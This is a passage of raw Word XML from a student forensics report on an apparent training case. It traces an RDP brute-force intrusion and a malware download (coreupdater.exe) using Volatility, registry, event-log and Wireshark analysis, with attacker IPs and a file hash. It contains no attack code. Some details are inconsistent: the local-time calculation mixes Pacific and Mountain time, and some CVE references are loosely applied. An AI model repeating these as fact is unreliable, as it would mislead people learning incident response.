          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2012 R2, x64 architecture.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MITRE ATT&amp;CK Reference: Reconnaissance through system fingerprinting (T1592).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is the Operating System of the Desktop?</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Using Volatility3</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C:\Users\student\Desktop\volatility3-2.5.2&gt;py vol.py -f "C:\Users\student\Desktop\ForensicsProject\Desktop\DESKTOP-SDN1RPT-memory\DESKTOP-SDN1RPT.mem" windows.info</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514975" cy="307657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90532" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId26"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5514975" cy="30765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4.25pt;height:242.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId26"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4 Volatility Desktop OS Capture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Conclusion: The Desktop workstation is running Windows 10 (x64 architecture).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was the Local Time of the Server?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Extracted the SYSTEM registry hive in FTK Imager and analyzed it using Registry Explorer. Searched for "TimeZoneInformation"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261937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4102" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId27"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="2619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8.00pt;height:206.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId27"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5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Registry Explorer showing the Time Zone Information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664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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TimeZoneKeyName: Pacific Time</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ActiveTimeBias: 420 (7 hours)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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DaylightBias: -60</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used Volatility WorkBench to get the system time for the memory capture as seen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629025"/>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23000" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId28"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3629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8.00pt;height:285.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId28"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6. Volatility WorkBench showing the system time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SystemTime (UTC): 2020-09-19 04:39:59. Taking into Consideration the ActiveTimeBias and the DayLightBias of 420 and -60 respectively.</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Giving us UTC - 6 hours = 22:39:59 MDT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Conclusion: The server's local time was 22:39:59 MDT on 09/18/2020.</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CVE Reference: Misconfigured time settings can lead to attacks leveraging CVE-2020-0601.</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Was There a Breach?</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Yes, we know from the case summary that the recipe was stolen and after further analysis, the attacker successfully accessed the DC01 and DESKTOP-SDN1RPT, deployed malware (coreupdater.exe), and exfiltrated data.</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294322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99902" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId29"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599"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8.00pt;height:231.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId29"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Fig 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Volatility WorkBench showing the Breach</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MITRE ATT&amp;CK Tactic: Initial Access via brute-force RDP (T1110.001).</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was the initial entry vector (how did they get in)?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Did research for  known vulnerabilities that could be exploited in relation to DC01 and the DESKTOP-SDN1RPT to have an idea of where to start. I noticed for research for the DC01 remote access Vulnerabilities is quite known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So I exported Security logs using FTK Imager from “Windows\System32\winevt\Logs\” as seen below and filtered for:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Event ID 4625: Failed logons</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Event ID 4624: Successful logons</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="120" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Reference: Exploitation of CVE-2019-0708 ("BlueKeep") for RDP vulnerabilities.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="120" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Findings:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple failed logins occurred between 11:21 PM and 12:13 AM from workstation name: Kali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700"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5534025" cy="354330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2254" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId30"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5534024" cy="3543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35.75pt;height:279.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId30"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700"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig 9: Failed Login Attempts</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful logins followed, originating from 2 IP 10.42.85.10 and 10.42.85.115 as shown below</w:t>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5219700" cy="330517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41853" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId31"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5219699" cy="33051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11.00pt;height:260.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId31"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700"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig 10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful Logins on IP 10.42.85.10</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="70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781425"/>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74856" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId32"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3781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8.00pt;height:297.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId32"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Fig 11. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful Logins on IP 10.42.85.115</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loaded my DC01 pcap file into wireshark for further analysis and ran an ICMP filter and noticed an IP 194.61.24.102 sent a ping to 10.42.85.10 and there was a reply as seen in the image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229225" cy="3343275"/>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08540" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId33"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5229225" cy="3343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11.75pt;height:263.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId33"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Fig 12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark Using ICMP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Proceeded to look more into the  IP 194.61.24.102  using ip.addr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Proceeding this is the beginning of the bruteforce attack against the DC. as shown in the image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534025" cy="353377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9549" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId34"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5534024" cy="3533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35.75pt;height:278.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId34"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13:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark Using ip.addr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120" w:firstLine="0" w:left="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP Bruteforce confirmed:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 3389 was used: TCP port 3389 is the default port for Remote Desktop Protocol (RDP)</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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion: The initial entry vector was RDP brute-force attack from IP 194.61.24.102.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Was malware used? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">YES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rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">If so, what was it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> coreupdater.exe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process was malicious?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When reviewing the pcap, I began searching for all traffic related to the suspect IP 194.61.24.102 to see what happened beyond the initial access.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MITRE ATT&amp;CK Reference: Execution (T1059.001), Persistence (T1543.003)</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used the ip.src == 194.61.24.102 &amp;&amp; HTTP filter as the image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743575" cy="3629025"/>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5018" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId35"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5743574" cy="3629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2.25pt;height:285.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId35"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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark showing ip.src == 194.61.24.102 &amp;&amp; HTTP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noticed an application/x-msdos-program and text/html  sent payloads to  10.42.85.10 and 10.42.85.115. Doing more analysis and  inspecting these packets, the method of delivery is a SimpleHTTP Python server as shown below. On research, I found out this is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> a common method of deploying malware.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4981575" cy="316230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21653" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId36"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4981574" cy="3162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2.25pt;height:249.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId36"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15:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark showing  SimpleHTTP Python server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781675" cy="400050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3402" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId37"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5781674" cy="4000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5.25pt;height:315.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId37"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16:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark showing  Payload</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proceeded to export objects of  the packet payload for  application/x-msdos-program on wireshark  so I can run the Hash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2981325"/>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36879" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId38"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="2981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8.00pt;height:234.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId38"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17:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark showing  Exporting the Payload</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800475"/>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46833" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId39"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3800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8.00pt;height:299.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId39"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18:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting Coreupdater.exe Payload hash</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Coreupdatere.exe hash : 10F3B92002BB98467334161CF85D0B1730851F9256F83C27DB125E9A0C1CFDA6</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put the hash into VirusTotal as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057525"/>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00531" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId40"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="30575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8.00pt;height:240.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId40"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19:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">VirusTotal Showing the Hash and the Malware assessment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Identify the IP Address that delivered the payload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 194.61.24.102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IP Address is the malware calling to?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">203.78.103.109 as seen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485775" cy="66675"/>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72745" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId41"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="485775" cy="66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8.25pt;height:5.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId41" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5943600" cy="2943225"/>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42670" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId42"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599"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8.00pt;height:231.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
